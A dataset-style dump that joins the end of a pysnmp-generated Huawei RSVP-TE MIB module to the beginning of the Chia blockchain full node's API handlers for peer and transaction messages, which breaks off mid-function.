hwRsvpTeRroGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 9)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroIpAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroIpPrefixLen"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroLabel"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroFlag"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeRroGroup = hwRsvpTeRroGroup.setStatus('current')
hwRsvpTeEroGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 10)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroType"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroIpAddr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroIpPrefixLen"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeEroGroup = hwRsvpTeEroGroup.setStatus('current')
hwRsvpTeTrapObjectsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 11)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbr"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrCurrentCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThreshold"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCount"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfName"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeTrapObjectsGroup = hwRsvpTeTrapObjectsGroup.setStatus('current')
hwRsvpTeTrapGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 1, 12)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeHelloLost"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeHelloLostRecovery"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeAuthFail"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeAuthSuccess"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThresholdExceed"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrThresholdExceedClear"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCountExceed"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfNbrTotalCountExceedClear"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeTrapGroup = hwRsvpTeTrapGroup.setStatus('current')
hwRsvpTeCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 2))
hwRsvpTeCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 2, 2, 1)).setObjects(("HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeIfGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeNbrGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeFilterSpecGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeRroGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeEroGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeTrapObjectsGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeTrapGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdGroup"), ("HUAWEI-RSVPTE-MIB", "hwRsvpTeMessageIdGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwRsvpTeCompliance = hwRsvpTeCompliance.setStatus('current')
mibBuilder.exportSymbols("HUAWEI-RSVPTE-MIB", hwRsvpTeIfIpNbrs=hwRsvpTeIfIpNbrs, hwRsvpTeResvFwdTSpecMaxTu=hwRsvpTeResvFwdTSpecMaxTu, hwRsvpTeSenderAdspecGuaranteedHopCount=hwRsvpTeSenderAdspecGuaranteedHopCount, hwRsvpTeMessageIdFlag=hwRsvpTeMessageIdFlag, hwRsvpTeResvFwdSenderAddr=hwRsvpTeResvFwdSenderAddr, hwRsvpTeCompliances=hwRsvpTeCompliances, hwRsvpTeIfRefreshInterval=hwRsvpTeIfRefreshInterval, hwRsvpTeIfGroup=hwRsvpTeIfGroup, hwRsvpTeSenderSessionAttrIncludeAny=hwRsvpTeSenderSessionAttrIncludeAny, hwRsvpTeResvFwdTable=hwRsvpTeResvFwdTable, hwRsvpTeGroups=hwRsvpTeGroups, hwRsvpTeRroIpPrefixLen=hwRsvpTeRroIpPrefixLen, hwRsvpTeResvFwdSenderAddrLength=hwRsvpTeResvFwdSenderAddrLength, hwRsvpTeEroTable=hwRsvpTeEroTable, hwRsvpTeIfRefreshBlockadeMultiple=hwRsvpTeIfRefreshBlockadeMultiple, hwRsvpTeNbrGrRecoveryTime=hwRsvpTeNbrGrRecoveryTime, hwRsvpTeEroIpAddr=hwRsvpTeEroIpAddr, hwRsvpTeIfRouteDelay=hwRsvpTeIfRouteDelay, hwRsvpTeSenderAdspecCtrlLoadMtu=hwRsvpTeSenderAdspecCtrlLoadMtu, hwRsvpTeSessionRequests=hwRsvpTeSessionRequests, hwRsvpTeSessionSenders=hwRsvpTeSessionSenders, hwRsvpTeSenderEntry=hwRsvpTeSenderEntry, hwRsvpTeSenderRsvpHop=hwRsvpTeSenderRsvpHop, hwRsvpTeTrapGroup=hwRsvpTeTrapGroup, hwRsvpTeIfNbrCurrentCount=hwRsvpTeIfNbrCurrentCount, hwRsvpTeNbrProtocol=hwRsvpTeNbrProtocol, hwRsvpTeMessageIdTable=hwRsvpTeMessageIdTable, hwRsvpTeRroNumber=hwRsvpTeRroNumber, hwRsvpTeSenderLabelRequestFrMinDlci=hwRsvpTeSenderLabelRequestFrMinDlci, hwRsvpTeResvFwdDestAddr=hwRsvpTeResvFwdDestAddr, hwRsvpTeIfStatus=hwRsvpTeIfStatus, hwRsvpTeResvType=hwRsvpTeResvType, hwRsvpTeSessionDestAddr=hwRsvpTeSessionDestAddr, hwRsvpTeResvEntry=hwRsvpTeResvEntry, hwRsvpTeIfAuthEncrypted=hwRsvpTeIfAuthEncrypted, hwRsvpTeRroGroup=hwRsvpTeRroGroup, hwRsvpTeSenderType=hwRsvpTeSenderType, hwRsvpTeSenderFrrIncludeAny=hwRsvpTeSenderFrrIncludeAny, hwRsvpTeSenderSessionAttrType=hwRsvpTeSenderSessionAttrType, hwRsvpTeMessageIdNumber=hwRsvpTeMessageIdNumber, hwRsvpTeSenderLabelRequestAtmMaxVpi=hwRsvpTeSenderLabelRequestAtmMaxVpi, hwRsvpTeFilterSpecIngressLsrId=hwRsvpTeFilterSpecIngressLsrId, hwRsvpTeRroEntry=hwRsvpTeRroEntry, hwRsvpTeResvFwdRSpecRate=hwRsvpTeResvFwdRSpecRate, hwRsvpTe=hwRsvpTe, hwRsvpTeResvFwdHopLih=hwRsvpTeResvFwdHopLih, hwRsvpTeNbrHelloDstInstance=hwRsvpTeNbrHelloDstInstance, hwRsvpTeSessionNumber=hwRsvpTeSessionNumber, hwRsvpTeSessionEntry=hwRsvpTeSessionEntry, hwRsvpTeSenderMsgIdSndNumber=hwRsvpTeSenderMsgIdSndNumber, hwRsvpTeIfUdpNbrs=hwRsvpTeIfUdpNbrs, hwRsvpTeResvShared=hwRsvpTeResvShared, hwRsvpTeSenderAdspecPathBw=hwRsvpTeSenderAdspecPathBw, hwRsvpTeIfRetranInterval=hwRsvpTeIfRetranInterval, hwRsvpTeFilterSpecTable=hwRsvpTeFilterSpecTable, hwRsvpTeResvScope=hwRsvpTeResvScope, hwRsvpTeNbrGroup=hwRsvpTeNbrGroup, hwRsvpTeCompliance=hwRsvpTeCompliance, hwRsvpTeSessionTable=hwRsvpTeSessionTable, hwRsvpTeNbrHelloSrcInstance=hwRsvpTeNbrHelloSrcInstance, hwRsvpTeEroType=hwRsvpTeEroType, hwRsvpTeSenderAdspecGuaranteedMinLatency=hwRsvpTeSenderAdspecGuaranteedMinLatency, hwRsvpTeAuthFail=hwRsvpTeAuthFail, hwRsvpTeSenderFrrInuseFlag=hwRsvpTeSenderFrrInuseFlag, hwRsvpTeSenderMsgIdRcvFlag=hwRsvpTeSenderMsgIdRcvFlag, hwRsvpTeResvFwdTSpecPeakRate=hwRsvpTeResvFwdTSpecPeakRate, hwRsvpTeResvService=hwRsvpTeResvService, hwRsvpTeResvPolicy=hwRsvpTeResvPolicy, hwRsvpTeNbrAuthKeyId=hwRsvpTeNbrAuthKeyId, hwRsvpTeRroLabel=hwRsvpTeRroLabel, hwRsvpTeSenderFrrIncludeAll=hwRsvpTeSenderFrrIncludeAll, hwRsvpTeSenderClassType=hwRsvpTeSenderClassType, hwRsvpTeSenderSessionAttrExcludeAny=hwRsvpTeSenderSessionAttrExcludeAny, 
hwRsvpTeIfAuthKey=hwRsvpTeIfAuthKey, hwRsvpTeSenderTSpecBurst=hwRsvpTeSenderTSpecBurst, hwRsvpTeIfNbrTotalCount=hwRsvpTeIfNbrTotalCount, hwRsvpTeIfNbrTotalCountExceedClear=hwRsvpTeIfNbrTotalCountExceedClear, hwRsvpTeSenderFrrExcludeAny=hwRsvpTeSenderFrrExcludeAny, hwRsvpTeResvConfirm=hwRsvpTeResvConfirm, hwRsvpTeResvDestAddr=hwRsvpTeResvDestAddr, hwRsvpTeResvFwdShared=hwRsvpTeResvFwdShared, hwRsvpTeHelloLostRecovery=hwRsvpTeHelloLostRecovery, hwRsvpTeResvTSpecRate=hwRsvpTeResvTSpecRate, hwRsvpTeSenderNumber=hwRsvpTeSenderNumber, hwRsvpTeSenderAdspecHopCount=hwRsvpTeSenderAdspecHopCount, hwRsvpTeSessionDestAddrLength=hwRsvpTeSessionDestAddrLength, hwRsvpTeSenderTable=hwRsvpTeSenderTable, hwRsvpTeSenderPolicy=hwRsvpTeSenderPolicy, hwRsvpTeSenderAdspecGuaranteedCtot=hwRsvpTeSenderAdspecGuaranteedCtot, hwRsvpTeResvFwdType=hwRsvpTeResvFwdType, hwRsvpTeNbrEntry=hwRsvpTeNbrEntry, hwRsvpTeSenderHopAddr=hwRsvpTeSenderHopAddr, hwRsvpTeSenderMsgIdSndEpoch=hwRsvpTeSenderMsgIdSndEpoch, hwRsvpTeSenderFrrBandwidth=hwRsvpTeSenderFrrBandwidth, hwRsvpTeSenderTSpecPeakRate=hwRsvpTeSenderTSpecPeakRate, hwRsvpTeSenderAddr=hwRsvpTeSenderAddr, hwRsvpTeSenderFrrHopLimit=hwRsvpTeSenderFrrHopLimit, hwRsvpTeSenderSessionAttrName=hwRsvpTeSenderSessionAttrName, hwRsvpTeResvSenderAddrLength=hwRsvpTeResvSenderAddrLength, hwRsvpTeResvInterface=hwRsvpTeResvInterface, hwRsvpTeResvRsvpHop=hwRsvpTeResvRsvpHop, hwRsvpTeResvFwdExplicit=hwRsvpTeResvFwdExplicit, hwRsvpTeIfTtl=hwRsvpTeIfTtl, hwRsvpTeResvFwdDestAddrLength=hwRsvpTeResvFwdDestAddrLength, hwRsvpTeResvTSpecBurst=hwRsvpTeResvTSpecBurst, hwRsvpTeRroIpAddr=hwRsvpTeRroIpAddr, hwRsvpTeNbrGrRestartTime=hwRsvpTeNbrGrRestartTime, hwRsvpTeResvTSpecMaxTu=hwRsvpTeResvTSpecMaxTu, hwRsvpTeNbr=hwRsvpTeNbr, hwRsvpTeSessionType=hwRsvpTeSessionType, hwRsvpTeIfAuthEnabled=hwRsvpTeIfAuthEnabled, hwRsvpTeFilterSpecLabel=hwRsvpTeFilterSpecLabel, PYSNMP_MODULE_ID=hwRsvpTe, hwRsvpTeResvFwdNumber=hwRsvpTeResvFwdNumber, hwRsvpTeExtendObjects=hwRsvpTeExtendObjects, hwRsvpTeIfName=hwRsvpTeIfName, hwRsvpTeIfSrefreshInterval=hwRsvpTeIfSrefreshInterval, hwRsvpTeSessionLspsNumber=hwRsvpTeSessionLspsNumber, hwRsvpTeSenderAdspecGuaranteedDsum=hwRsvpTeSenderAdspecGuaranteedDsum, hwRsvpTeSenderSessionAttrSetupPrio=hwRsvpTeSenderSessionAttrSetupPrio, hwRsvpTeSenderTSpecRate=hwRsvpTeSenderTSpecRate, hwRsvpTeSenderAdspecGuaranteedDtot=hwRsvpTeSenderAdspecGuaranteedDtot, hwRsvpTeSenderAdspecCtrlLoadSvc=hwRsvpTeSenderAdspecCtrlLoadSvc, hwRsvpTeResvGroup=hwRsvpTeResvGroup, hwRsvpTeSessionGroup=hwRsvpTeSessionGroup, hwRsvpTeRroFlag=hwRsvpTeRroFlag, hwRsvpTeResvExplicit=hwRsvpTeResvExplicit, hwRsvpTeIfNbrThreshold=hwRsvpTeIfNbrThreshold, hwRsvpTeRroTable=hwRsvpTeRroTable, hwRsvpTeRroType=hwRsvpTeRroType, hwRsvpTeSenderDestAddr=hwRsvpTeSenderDestAddr, hwRsvpTeEroEntry=hwRsvpTeEroEntry, hwRsvpTeSenderAdspecCtrlLoadPathBw=hwRsvpTeSenderAdspecCtrlLoadPathBw, hwRsvpTeResvFwdGroup=hwRsvpTeResvFwdGroup, hwRsvpTeTrapObjectsGroup=hwRsvpTeTrapObjectsGroup, hwRsvpTeResvTable=hwRsvpTeResvTable, hwRsvpTeIfRefreshMultiple=hwRsvpTeIfRefreshMultiple, hwRsvpTeSenderGroup=hwRsvpTeSenderGroup, hwRsvpTeFilterSpecGroup=hwRsvpTeFilterSpecGroup, hwRsvpTeEroGroup=hwRsvpTeEroGroup, hwRsvpTeResvSenderAddr=hwRsvpTeResvSenderAddr, hwRsvpTeNbrReceiversNumber=hwRsvpTeNbrReceiversNumber, hwRsvpTeNbrReliabilityEnabled=hwRsvpTeNbrReliabilityEnabled, hwRsvpTeNbrHelloEnabled=hwRsvpTeNbrHelloEnabled, hwRsvpTeNbrGrCapability=hwRsvpTeNbrGrCapability, hwRsvpTeResvTtl=hwRsvpTeResvTtl, hwRsvpTeSenderSessionAttrFlag=hwRsvpTeSenderSessionAttrFlag, 
hwRsvpTeResvTSpecMinTu=hwRsvpTeResvTSpecMinTu, hwRsvpTeSenderMsgIdRcvEpoch=hwRsvpTeSenderMsgIdRcvEpoch, hwRsvpTeIfWindowSize=hwRsvpTeIfWindowSize, hwRsvpTeSenderDiffServPsc=hwRsvpTeSenderDiffServPsc, hwRsvpTeMessageIdEpoch=hwRsvpTeMessageIdEpoch, hwRsvpTeNbrTable=hwRsvpTeNbrTable, hwRsvpTeNbrGrStatus=hwRsvpTeNbrGrStatus, hwRsvpTeSenderLabelRequestFrMaxDlci=hwRsvpTeSenderLabelRequestFrMaxDlci, hwRsvpTeSessionReceivers=hwRsvpTeSessionReceivers, hwRsvpTeResvFwdScope=hwRsvpTeResvFwdScope, hwRsvpTeSenderAdspecMtu=hwRsvpTeSenderAdspecMtu, hwRsvpTeSenderMsgIdSndFlag=hwRsvpTeSenderMsgIdSndFlag, hwRsvpTeSenderAdspecGuaranteedBreak=hwRsvpTeSenderAdspecGuaranteedBreak, hwRsvpTeResvTSpecPeakRate=hwRsvpTeResvTSpecPeakRate, hwRsvpTeIfRetranIncDelta=hwRsvpTeIfRetranIncDelta, hwRsvpTeSenderFrrFlag=hwRsvpTeSenderFrrFlag, hwRsvpTeResvFwdInterface=hwRsvpTeResvFwdInterface, hwRsvpTeSenderTtl=hwRsvpTeSenderTtl, hwRsvpTeSenderAdspecMinLatency=hwRsvpTeSenderAdspecMinLatency, hwRsvpTeResvFwdTtl=hwRsvpTeResvFwdTtl, hwRsvpTeSenderLabelRequestAtmMinVci=hwRsvpTeSenderLabelRequestAtmMinVci, hwRsvpTeResvFwdService=hwRsvpTeResvFwdService, hwRsvpTeSenderInterface=hwRsvpTeSenderInterface, hwRsvpTeSenderInterval=hwRsvpTeSenderInterval, hwRsvpTeResvFwdRsvpHop=hwRsvpTeResvFwdRsvpHop, hwRsvpTeEroIpPrefixLen=hwRsvpTeEroIpPrefixLen, hwRsvpTeResvFwdEntry=hwRsvpTeResvFwdEntry, hwRsvpTeLspId=hwRsvpTeLspId, hwRsvpTeResvFwdRSpecSlack=hwRsvpTeResvFwdRSpecSlack, hwRsvpTeResvRSpecSlack=hwRsvpTeResvRSpecSlack, hwRsvpTeResvFwdInterval=hwRsvpTeResvFwdInterval, hwRsvpTeResvFwdHopAddr=hwRsvpTeResvFwdHopAddr, hwRsvpTeSenderAdspecCtrlLoadBreak=hwRsvpTeSenderAdspecCtrlLoadBreak, hwRsvpTeResvFwdPolicy=hwRsvpTeResvFwdPolicy, hwRsvpTeConformance=hwRsvpTeConformance, hwRsvpTeSenderAdspecBreak=hwRsvpTeSenderAdspecBreak, hwRsvpTeResvFwdTSpecBurst=hwRsvpTeResvFwdTSpecBurst, hwRsvpTeResvFwdMsgIdNumber=hwRsvpTeResvFwdMsgIdNumber, hwRsvpTeExtendTrap=hwRsvpTeExtendTrap, hwRsvpTeAuthSuccess=hwRsvpTeAuthSuccess, hwRsvpTeFilterSpecNumber=hwRsvpTeFilterSpecNumber, hwRsvpTeIfNbrTotalCountExceed=hwRsvpTeIfNbrTotalCountExceed, hwRsvpTeSenderFrrSetupPrio=hwRsvpTeSenderFrrSetupPrio, hwRsvpTeResvHopLih=hwRsvpTeResvHopLih, hwRsvpTeIfEnabled=hwRsvpTeIfEnabled, hwRsvpTeIfTable=hwRsvpTeIfTable, hwRsvpTeIfHelloEnabled=hwRsvpTeIfHelloEnabled, hwRsvpTeIfAuthLifeTime=hwRsvpTeIfAuthLifeTime, hwRsvpTeSenderMsgIdRcvNumber=hwRsvpTeSenderMsgIdRcvNumber, hwRsvpTeResvFwdTSpecRate=hwRsvpTeResvFwdTSpecRate, hwRsvpTeSenderAdspecGuaranteedPathBw=hwRsvpTeSenderAdspecGuaranteedPathBw, hwRsvpTeResvDestAddrLength=hwRsvpTeResvDestAddrLength, hwRsvpTeNbrHelloLostCounter=hwRsvpTeNbrHelloLostCounter, hwRsvpTeSenderAdspecCtrlLoadHopCount=hwRsvpTeSenderAdspecCtrlLoadHopCount, hwRsvpTeHelloLost=hwRsvpTeHelloLost, hwRsvpTeIfUdpRequired=hwRsvpTeIfUdpRequired, hwRsvpTeNbrReductionEnabled=hwRsvpTeNbrReductionEnabled, hwRsvpTeSessionStyle=hwRsvpTeSessionStyle, hwRsvpTeNbrAddress=hwRsvpTeNbrAddress, hwRsvpTeNbrHelloType=hwRsvpTeNbrHelloType, hwRsvpTeSessionTunnelId=hwRsvpTeSessionTunnelId, hwRsvpTeIfSrefreshEnabled=hwRsvpTeIfSrefreshEnabled, hwRsvpTeEroNumber=hwRsvpTeEroNumber, hwRsvpTeSenderAdspecGuaranteedCsum=hwRsvpTeSenderAdspecGuaranteedCsum, hwRsvpTeSenderSessionAttrHoldPrio=hwRsvpTeSenderSessionAttrHoldPrio, hwRsvpTeSenderLabelRequestAtmMaxVci=hwRsvpTeSenderLabelRequestAtmMaxVci, hwRsvpTeSenderHopLih=hwRsvpTeSenderHopLih, hwRsvpTeFilterSpecLspId=hwRsvpTeFilterSpecLspId, hwRsvpTeSenderSessionAttrIncludeAll=hwRsvpTeSenderSessionAttrIncludeAll, 
hwRsvpTeSenderLabelRequestL3pid=hwRsvpTeSenderLabelRequestL3pid, hwRsvpTeSenderAdspecGuaranteedMtu=hwRsvpTeSenderAdspecGuaranteedMtu, hwRsvpTeResvNumber=hwRsvpTeResvNumber, hwRsvpTeTrapObjects=hwRsvpTeTrapObjects, hwRsvpTeResvFwdMsgIdEpoch=hwRsvpTeResvFwdMsgIdEpoch, hwRsvpTeSenderDestAddrLength=hwRsvpTeSenderDestAddrLength, hwRsvpTeIfAuthHandshake=hwRsvpTeIfAuthHandshake, hwRsvpTeSenderTSpecMaxTu=hwRsvpTeSenderTSpecMaxTu, hwRsvpTeSenderLabelRequestCtype=hwRsvpTeSenderLabelRequestCtype, hwRsvpTeObjects=hwRsvpTeObjects, hwRsvpTeIfNbrThresholdExceed=hwRsvpTeIfNbrThresholdExceed, hwRsvpTeResvFwdMsgIdFlag=hwRsvpTeResvFwdMsgIdFlag, hwRsvpTeResvInterval=hwRsvpTeResvInterval, hwRsvpTeSessionTunnelExtId=hwRsvpTeSessionTunnelExtId, hwRsvpTeMessageIdGroup=hwRsvpTeMessageIdGroup, hwRsvpTeSenderTSpecMinTu=hwRsvpTeSenderTSpecMinTu, hwRsvpTeResvRSpecRate=hwRsvpTeResvRSpecRate, hwRsvpTeSenderFrrHoldPrio=hwRsvpTeSenderFrrHoldPrio, hwRsvpTeResvFwdTSpecMinTu=hwRsvpTeResvFwdTSpecMinTu, hwRsvpTeNbrSendersNumber=hwRsvpTeNbrSendersNumber, hwRsvpTeIfEntry=hwRsvpTeIfEntry, hwRsvpTeSenderAdspecGuaranteedSvc=hwRsvpTeSenderAdspecGuaranteedSvc, hwRsvpTeMessageIdEntry=hwRsvpTeMessageIdEntry, hwRsvpTeFilterSpecEntry=hwRsvpTeFilterSpecEntry, hwRsvpTeTrap=hwRsvpTeTrap, hwRsvpTeNbrStatus=hwRsvpTeNbrStatus, hwRsvpTeSenderAdspecCtrlLoadMinLatency=hwRsvpTeSenderAdspecCtrlLoadMinLatency, hwRsvpTeIfNbrs=hwRsvpTeIfNbrs, hwRsvpTeIfNbrThresholdExceedClear=hwRsvpTeIfNbrThresholdExceedClear, hwRsvpTeResvHopAddr=hwRsvpTeResvHopAddr, hwRsvpTeSenderLabelRequestAtmMinVpi=hwRsvpTeSenderLabelRequestAtmMinVpi, hwRsvpTeSenderAddrLength=hwRsvpTeSenderAddrLength)
| true | true |
790da6315d54ab39b87b78c2b6aab8546c002052 | 72,148 | py | Python | chia/full_node/full_node_api.py | AppleOfEnlightenment/chia-blockchain | d3f2ae367d00cf20360c7d7a177f941ea53ecbcb | ["Apache-2.0"] | null | null | null | chia/full_node/full_node_api.py | AppleOfEnlightenment/chia-blockchain | d3f2ae367d00cf20360c7d7a177f941ea53ecbcb | ["Apache-2.0"] | null | null | null | chia/full_node/full_node_api.py | AppleOfEnlightenment/chia-blockchain | d3f2ae367d00cf20360c7d7a177f941ea53ecbcb | ["Apache-2.0"] | null | null | null |
import asyncio
import dataclasses
import time
import traceback
from secrets import token_bytes
from typing import Dict, List, Optional, Tuple, Set
from blspy import AugSchemeMPL, G2Element
from chiabip158 import PyBIP158
import chia.server.ws_connection as ws
from chia.consensus.block_creation import create_unfinished_block
from chia.consensus.block_record import BlockRecord
from chia.consensus.pot_iterations import calculate_ip_iters, calculate_iterations_quality, calculate_sp_iters
from chia.full_node.bundle_tools import best_solution_generator_from_template, simple_solution_generator
from chia.full_node.full_node import FullNode
from chia.full_node.mempool_check_conditions import get_puzzle_and_solution_for_coin
from chia.full_node.signage_point import SignagePoint
from chia.protocols import farmer_protocol, full_node_protocol, introducer_protocol, timelord_protocol, wallet_protocol
from chia.protocols.full_node_protocol import RejectBlock, RejectBlocks
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.protocols.wallet_protocol import (
PuzzleSolutionResponse,
RejectHeaderBlocks,
RejectHeaderRequest,
CoinState,
RespondSESInfo,
)
from chia.server.outbound_message import Message, make_msg
from chia.types.blockchain_format.coin import Coin, hash_coin_list
from chia.types.blockchain_format.pool_target import PoolTarget
from chia.types.blockchain_format.program import Program
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from chia.types.coin_record import CoinRecord
from chia.types.end_of_slot_bundle import EndOfSubSlotBundle
from chia.types.full_block import FullBlock
from chia.types.generator_types import BlockGenerator
from chia.types.mempool_inclusion_status import MempoolInclusionStatus
from chia.types.mempool_item import MempoolItem
from chia.types.peer_info import PeerInfo
from chia.types.transaction_queue_entry import TransactionQueueEntry
from chia.types.unfinished_block import UnfinishedBlock
from chia.util.api_decorators import api_request, peer_required, bytes_required, execute_task, reply_type
from chia.util.generator_tools import get_block_header
from chia.util.hash import std_hash
from chia.util.ints import uint8, uint32, uint64, uint128
from chia.util.merkle_set import MerkleSet
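# API handlers of the full node: each coroutine below services one protocol message
# type and returns an Optional[Message] reply (returning None means no direct reply).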
class FullNodeAPI:
full_node: FullNode
    def __init__(self, full_node: FullNode) -> None:
self.full_node = full_node
@property
def server(self):
return self.full_node.server
@property
def log(self):
return self.full_node.log
@property
def api_ready(self):
return self.full_node.initialized
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_peers])
async def request_peers(self, _request: full_node_protocol.RequestPeers, peer: ws.WSChiaConnection):
if peer.peer_server_port is None:
return None
peer_info = PeerInfo(peer.peer_host, peer.peer_server_port)
if self.full_node.full_node_peers is not None:
msg = await self.full_node.full_node_peers.request_peers(peer_info)
return msg
@peer_required
@api_request
async def respond_peers(
self, request: full_node_protocol.RespondPeers, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), True)
return None
@peer_required
@api_request
async def respond_peers_introducer(
self, request: introducer_protocol.RespondPeersIntroducer, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers from introducer")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), False)
await peer.close()
return None
@execute_task
@peer_required
@api_request
async def new_peak(self, request: full_node_protocol.NewPeak, peer: ws.WSChiaConnection) -> Optional[Message]:
"""
A peer notifies us that they have added a new peak to their blockchain. If we don't have it,
we can ask for it.
"""
# this semaphore limits the number of tasks that can call new_peak() at
# the same time, since it can be expensive
waiter_count = len(self.full_node.new_peak_sem._waiters)
if waiter_count > 0:
self.full_node.log.debug(f"new_peak Waiters: {waiter_count}")
if waiter_count > 20:
return None
async with self.full_node.new_peak_sem:
return await self.full_node.new_peak(request, peer)
@peer_required
@api_request
async def new_transaction(
self, transaction: full_node_protocol.NewTransaction, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
A peer notifies us of a new transaction.
Requests a full transaction if we haven't seen it previously, and if the fees are enough.
"""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
if not (await self.full_node.synced()):
return None
# Ignore if already seen
if self.full_node.mempool_manager.seen(transaction.transaction_id):
return None
if self.full_node.mempool_manager.is_fee_enough(transaction.fees, transaction.cost):
            # If there's a current pending request, just add this peer to the set of peers that have this tx
if transaction.transaction_id in self.full_node.full_node_store.pending_tx_request:
if transaction.transaction_id in self.full_node.full_node_store.peers_with_tx:
current_set = self.full_node.full_node_store.peers_with_tx[transaction.transaction_id]
if peer.peer_node_id in current_set:
return None
current_set.add(peer.peer_node_id)
return None
else:
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
return None
self.full_node.full_node_store.pending_tx_request[transaction.transaction_id] = peer.peer_node_id
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
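            # Background task: ask one advertising peer at a time for the full transaction,
            # waiting 5 seconds between attempts, until the tx is seen in the mempool, no
            # advertising peers remain, or 5 attempts have been made.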
async def tx_request_and_timeout(full_node: FullNode, transaction_id, task_id):
counter = 0
try:
while True:
                        # Limit to asking a few peers; it's possible that this tx was already included on chain.
                        # It's highly unlikely that the peers that advertised a tx won't respond to a request. Also,
                        # if we drop some transactions, we don't want to refetch them too many times.
if counter == 5:
break
if transaction_id not in full_node.full_node_store.peers_with_tx:
break
peers_with_tx: Set = full_node.full_node_store.peers_with_tx[transaction_id]
if len(peers_with_tx) == 0:
break
peer_id = peers_with_tx.pop()
assert full_node.server is not None
if peer_id not in full_node.server.all_connections:
continue
peer = full_node.server.all_connections[peer_id]
request_tx = full_node_protocol.RequestTransaction(transaction.transaction_id)
msg = make_msg(ProtocolMessageTypes.request_transaction, request_tx)
await peer.send_message(msg)
await asyncio.sleep(5)
counter += 1
if full_node.mempool_manager.seen(transaction_id):
break
except asyncio.CancelledError:
pass
finally:
                    # Always clean up
if transaction_id in full_node.full_node_store.peers_with_tx:
full_node.full_node_store.peers_with_tx.pop(transaction_id)
if transaction_id in full_node.full_node_store.pending_tx_request:
full_node.full_node_store.pending_tx_request.pop(transaction_id)
if task_id in full_node.full_node_store.tx_fetch_tasks:
full_node.full_node_store.tx_fetch_tasks.pop(task_id)
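            # Spawn the fetch task and track it under a random id so it can be cleaned up
            # (see the finally block above).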
task_id: bytes32 = bytes32(token_bytes(32))
fetch_task = asyncio.create_task(
tx_request_and_timeout(self.full_node, transaction.transaction_id, task_id)
)
self.full_node.full_node_store.tx_fetch_tasks[task_id] = fetch_task
return None
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_transaction])
async def request_transaction(self, request: full_node_protocol.RequestTransaction) -> Optional[Message]:
"""Peer has requested a full transaction from us."""
# Ignore if syncing
if self.full_node.sync_store.get_sync_mode():
return None
spend_bundle = self.full_node.mempool_manager.get_spendbundle(request.transaction_id)
if spend_bundle is None:
return None
transaction = full_node_protocol.RespondTransaction(spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
return msg
@peer_required
@api_request
@bytes_required
async def respond_transaction(
self,
tx: full_node_protocol.RespondTransaction,
peer: ws.WSChiaConnection,
tx_bytes: bytes = b"",
test: bool = False,
) -> Optional[Message]:
"""
